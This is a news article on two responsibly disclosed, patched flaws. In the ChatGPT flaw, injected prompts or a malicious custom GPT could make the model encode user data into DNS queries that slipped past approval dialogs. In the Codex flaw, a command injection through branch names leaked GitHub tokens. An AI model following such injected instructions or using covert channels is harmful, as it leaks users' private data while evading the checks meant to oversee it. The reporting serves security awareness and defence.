- Check Point Research found ChatGPT flaw enabling silent data exfiltration via DNS abuse and prompt injection
- Vulnerability allowed attackers to bypass guardrails and steal sensitive user data through covert domain queries
- OpenAI patched issue on Feb 20, 2026, marking second major fix that week after Codex command injection flaw
OpenAI has addressed a vulnerability in ChatGPT which allowed threat actors to silently exfiltrate sensitive data from their targets.
The vulnerability was discovered by security experts from Check Point Research (CPR), who warned the bug combined old-fashioned prompt injections with a bypass of built-in guardrails, noting, “AI tools should not be assumed secure by default”.
Nowadays, most people are quick to share highly sensitive data with ChatGPT – medical conditions, contracts, payment slips, screenshots of conversations with partners, spouses, and more. They assume the information is secure because it cannot be pulled from the tool without their knowledge or consent.
Article continues below
DNS traffic is not risky behavior
In theory, that is correct. The data can be exfiltrated either through HTTP or external APIs, and both of these can be spotted, or at least tracked. However, CPR was thinking outside the box and found an entirely new way to pull the info – through DNS.
“While direct internet access was blocked as intended, DNS resolution remained available as part of normal system operation,” they explained. “DNS is typically treated as harmless infrastructure—used to resolve domain names, not to transmit data. However, DNS can be abused as a covert transport mechanism by encoding information into domain queries.”
Since DNS activity is not labeled as outbound data sharing, ChatGPT does not prompt any approval dialogs, does not display any warnings, and does not recognize the behavior as inherently risky.
“This created a blind spot. The platform assumed the environment was isolated. The model assumed it was operating entirely within ChatGPT. And users assumed their data could not leave without consent,” CPR said. “All three assumptions were reasonable—and all three were incomplete. This is a critical takeaway for security teams: AI guardrails often focus on policy and intent, while attackers exploit infrastructure and behavior.”
To kickstart the attack, ChatGPT still needs to be prompted, so the initial trigger still needs to be pulled. That can be done in a myriad of ways, though, by injecting a malicious prompt in an email, a PDF document, or through a website.
Still, there are other methods of abusing this flaw even without GPT accidentally acting on a smuggled prompt, and that it – via custom GPTs.
For example, a hacking group can build a custom GPT to act as a personal doctor. Victims using it would upload lab results with personal information and ask for advice and would get confirmation that their data is not being shared.
But in reality, a server under the attackers’ control would be getting all of the uploaded files. To make matters worse, GPT doesn’t even need to upload entire documents – it can only exfiltrate the essentials, making the process leaner, faster, and more streamlined.
Luckily for everyone, CPR discovered this vulnerability before it was exploited in the wild. It responsibly disclosed it to OpenAI, which deployed a full fix on February 20, 2026.
Patching ChatGPT and Codex
This is the second major vulnerability that OpenAI had to address – this week. Earlier today, TechRadar Pro reported about OpenAI’s ChatGPT Codex carrying a critical command injection vulnerability that allowed threat actors to steal sensitive GitHub authentication tokens.
OpenAI thus also fixed a flaw that stems from the way Codex processes branch names during task creation. The tool allowed a malicious actor to manipulate the branch parameter and inject arbitrary shell commands while setting up the environment. These commands could run any code within the container, including malicious ones. Researchers Phantom Labs said they were able to pull GitHub OAuth tokens this way, gaining access to a theoretical third-party project, and using the tokens to move laterally within GitHub.

The best antivirus for all budgets
Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews, and opinion in your feeds. Make sure to click the Follow button!
And of course you can also follow TechRadar on TikTok for news, reviews, unboxings in video form, and get regular updates from us on WhatsApp too.
https://cdn.mos.cms.futurecdn.net/ntFBAvimiZgyDikiV8K7mf-2560-80.jpg
Source link




